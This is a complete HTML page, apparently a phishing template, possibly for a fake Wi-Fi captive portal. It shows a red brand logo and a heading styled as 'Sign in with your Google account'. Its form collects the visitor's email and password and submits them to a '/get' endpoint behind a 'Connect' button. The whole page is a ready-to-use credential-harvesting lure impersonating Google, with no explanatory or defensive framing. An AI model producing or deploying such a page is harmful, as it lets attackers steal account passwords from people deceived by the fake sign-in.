<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #E71725;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #E71725;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #E71725;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 1px solid #E71725;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #E71725;
  border: none;
  color: #000000;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #E71725;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="240.000000pt" height="80.000000pt" viewBox="0 0 1200.000000 392.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,392.000000) scale(0.100000,-0.100000)"
fill="#E71725" stroke="none">
<path d="M2240 3905 c-234 -48 -533 -193 -787 -383 -782 -587 -1348 -1466
-1443 -2245 -8 -60 -11 -164 -7 -270 4 -142 9 -189 31 -271 67 -256 213 -438
443 -555 152 -76 378 -113 577 -92 200 20 602 106 1071 230 332 87 523 115
780 115 212 0 330 -19 474 -74 146 -57 289 -171 367 -294 16 -25 32 -45 35
-43 4 1 25 25 48 54 75 96 205 171 335 194 88 15 323 6 426 -16 176 -38 410
-134 539 -220 176 -117 -30 107 -265 289 -408 316 -700 418 -1189 418 -338 -1
-536 -33 -1220 -202 -876 -216 -970 -234 -1205 -228 -143 4 -163 7 -254 38
-121 41 -247 114 -303 177 -56 62 -109 164 -135 260 -17 65 -21 106 -21 243 0
142 4 182 27 287 117 533 391 1053 854 1623 117 144 458 482 565 562 275 204
545 285 610 184 22 -34 28 -71 16 -105 -10 -27 -16 -31 -47 -31 -118 -1 -244
-148 -246 -287 -1 -74 22 -113 77 -127 85 -22 182 40 261 167 84 135 116 258
96 370 -15 79 -39 124 -90 171 -69 62 -115 76 -243 75 -62 0 -141 -7 -177 -14z"/>
<path d="M8079 3910 c-241 -28 -610 -202 -916 -432 -297 -224 -661 -596 -905
-926 -252 -341 -483 -737 -594 -1017 -53 -137 -125 -361 -146 -460 -28 -131
-30 -383 -5 -492 80 -347 328 -537 646 -493 171 23 304 84 494 226 346 259
670 726 774 1119 34 127 42 312 18 400 -43 159 -153 220 -328 181 -87 -20
-229 -86 -302 -141 -256 -192 -435 -525 -504 -935 -11 -63 -18 -116 -16 -118
2 -2 42 35 90 81 100 99 209 182 331 252 l86 50 18 70 c57 225 206 461 332
526 52 27 119 25 145 -4 28 -30 35 -57 34 -133 -3 -407 -427 -1041 -822 -1229
-144 -68 -262 -57 -363 36 -128 117 -153 278 -92 579 75 367 227 712 519 1173
277 436 769 997 1079 1228 146 109 308 208 411 252 76 32 199 48 231 30 14 -8
6 -17 -51 -53 -183 -119 -409 -334 -536 -511 -83 -115 -199 -346 -228 -454
-16 -58 -20 -97 -17 -145 17 -228 189 -283 435 -139 32 19 108 84 169 144 275
274 462 671 466 987 l1 98 35 11 c48 16 169 5 257 -22 194 -59 306 -119 685
-364 129 -84 262 -167 294 -185 l59 -34 30 35 c16 19 83 91 148 161 l119 126
-158 95 c-86 52 -229 134 -317 182 -350 193 -466 234 -695 242 -159 6 -258 -9
-420 -64 l-105 -35 -54 36 c-86 58 -200 81 -332 66z m317 -432 c-49 -314 -199
-598 -434 -820 -82 -77 -180 -146 -236 -165 -48 -17 -99 -3 -123 33 -25 38
-13 142 27 237 126 301 420 640 706 812 36 22 61 32 67 26 6 -6 4 -52 -7 -123z"/>
<path d="M11949 3874 c-160 -167 -416 -352 -634 -460 -236 -117 -425 -164
-659 -164 l-128 0 -42 -47 c-71 -81 -226 -274 -226 -283 0 -23 189 -44 313
-36 189 12 346 56 542 151 263 127 473 296 671 540 83 102 224 328 212 340 -2
2 -24 -16 -49 -41z"/>
<path d="M10913 3865 c-293 -79 -876 -618 -1325 -1225 -247 -334 -499 -751
-717 -1188 -84 -167 -95 -185 -127 -198 -42 -18 -142 -39 -149 -32 -3 3 11 43
31 89 80 185 114 316 114 438 0 387 -397 371 -817 -32 -436 -420 -755 -1067
-693 -1406 31 -172 139 -250 303 -221 177 31 437 227 641 480 76 96 241 339
301 447 l40 72 55 6 c30 3 76 9 101 14 l45 7 -68 -209 c-81 -249 -109 -375
-109 -500 0 -118 19 -181 72 -241 56 -64 90 -80 171 -80 58 0 77 5 150 41 113
57 242 170 358 314 14 17 15 10 15 -79 1 -79 5 -106 23 -147 28 -61 46 -82 97
-108 64 -33 153 -29 239 11 87 41 181 107 271 194 l72 67 -5 -54 c-13 -158 78
-261 215 -240 60 9 209 85 301 155 121 91 304 289 455 493 70 94 227 332 227
344 0 9 -18 13 -65 13 l-64 0 -83 -122 c-156 -231 -297 -390 -421 -473 -56
-38 -78 -43 -97 -20 -9 11 -9 22 0 52 20 62 86 188 185 353 51 85 211 364 355
620 144 256 264 468 267 473 2 4 -86 7 -196 7 l-200 0 -22 -40 c-13 -22 -25
-40 -28 -40 -3 0 -21 20 -39 44 -39 52 -83 76 -155 83 -138 14 -312 -80 -530
-287 -192 -182 -364 -408 -646 -849 -158 -248 -274 -389 -355 -431 -38 -21
-48 -22 -71 -12 -38 17 -59 74 -51 142 13 123 87 361 180 572 l53 123 144 109
c299 225 583 487 858 791 226 251 465 546 507 627 l15 29 -68 -7 c-77 -7 -56
13 -221 -194 -288 -360 -760 -838 -1017 -1029 -38 -29 -71 -47 -73 -42 -12 36
384 710 626 1066 235 346 412 563 648 796 174 170 258 240 331 273 64 28 77
18 70 -54 -4 -46 -19 -90 -66 -187 -34 -69 -59 -128 -57 -131 3 -2 36 3 74 13
l69 17 41 86 c95 199 93 378 -3 418 -43 17 -114 17 -182 -1z m-2362 -2025 c62
-34 71 -177 20 -330 -45 -133 -108 -260 -129 -260 -28 0 -116 56 -152 96 -110
126 -98 292 31 408 87 78 179 113 230 86z m2181 -37 c10 -9 18 -23 18 -31 0
-8 -51 -103 -114 -211 -62 -108 -160 -277 -216 -376 -231 -405 -408 -645 -517
-703 -31 -17 -79 -15 -99 5 -35 35 -2 191 77 358 65 138 270 462 383 605 131
165 276 308 359 352 41 22 85 23 109 1z m-2558 -539 c34 -33 94 -80 134 -104
54 -32 71 -47 67 -59 -3 -8 -34 -62 -67 -118 -174 -291 -396 -513 -514 -513
-38 0 -77 29 -94 70 -49 119 81 444 309 768 l65 93 19 -38 c11 -21 47 -65 81
-99z"/>
<path d="M2440 2965 c-80 -22 -208 -89 -308 -159 -112 -78 -355 -320 -461
-459 -292 -381 -449 -799 -402 -1071 29 -163 115 -245 259 -246 154 0 351 116
566 334 174 176 284 325 452 608 l69 117 82 20 c45 12 84 21 86 21 2 0 -31
-69 -73 -153 -137 -275 -177 -437 -151 -618 16 -111 51 -187 112 -244 77 -72
124 -88 249 -83 209 8 360 91 635 347 71 66 131 119 132 117 2 -2 -4 -34 -13
-72 -23 -98 -21 -220 4 -276 36 -83 119 -124 231 -115 111 8 234 77 369 205
l72 70 0 -74 c0 -88 21 -139 72 -176 28 -19 45 -23 109 -23 66 0 84 4 150 37
146 72 374 279 555 504 119 147 304 402 304 418 0 4 -31 6 -69 6 l-69 0 -70
-94 c-216 -287 -422 -485 -494 -474 -18 2 -24 10 -26 38 -2 30 52 129 398 730
221 382 406 703 411 713 9 16 -3 17 -188 17 l-198 0 -18 -31 -18 -32 -37 38
c-47 47 -81 65 -141 72 -235 28 -598 -279 -1001 -844 -279 -390 -485 -621
-659 -735 -109 -71 -201 -94 -259 -64 -109 57 -122 205 -37 421 133 339 342
659 572 874 150 141 260 185 318 126 38 -37 32 -105 -9 -105 -54 0 -103 -24
-152 -74 -67 -68 -94 -127 -94 -200 0 -50 4 -61 29 -87 33 -33 79 -38 134 -16
81 34 197 205 232 342 77 304 -184 461 -503 301 -107 -54 -225 -147 -397 -316
-176 -172 -294 -265 -400 -316 -61 -30 -95 -41 -95 -31 0 2 18 50 39 108 53
141 74 250 69 358 -3 74 -9 95 -35 142 -44 79 -100 111 -201 116 -48 2 -98 -3
-132 -12z m164 -186 c35 -16 60 -79 59 -152 -1 -79 -24 -167 -76 -290 l-42
-97 -40 6 c-22 4 -61 17 -86 30 -166 83 -195 228 -78 380 83 108 188 157 263
123z m2496 -19 c24 -24 34 -2 -111 -257 -185 -324 -411 -707 -473 -798 -108
-159 -253 -295 -316 -295 -37 0 -64 33 -63 77 3 92 114 344 243 552 70 111
276 389 388 524 155 185 273 256 332 197z m-2885 -506 c55 -55 133 -102 233
-140 22 -9 20 -13 -63 -149 -48 -77 -117 -181 -155 -231 -81 -106 -217 -239
-284 -279 -94 -55 -173 -31 -197 58 -34 128 94 438 315 760 60 88 61 89 75 65
8 -12 42 -50 76 -84z"/>
<path d="M5805 2798 c-44 -72 -90 -149 -103 -170 l-23 -38 188 0 188 1 80 131
c44 72 90 149 103 170 l23 38 -188 0 -188 -1 -80 -131z"/>
</g>
</svg>






  </div>

  <div class="form-container">

    <center><h1>Sign in with your <b><font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
</b> account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
	  
      <button class="submit-btn" type="submit"><b>Connect</b></button>
    
    </form>

  </div>

</div>
</body>
</html>
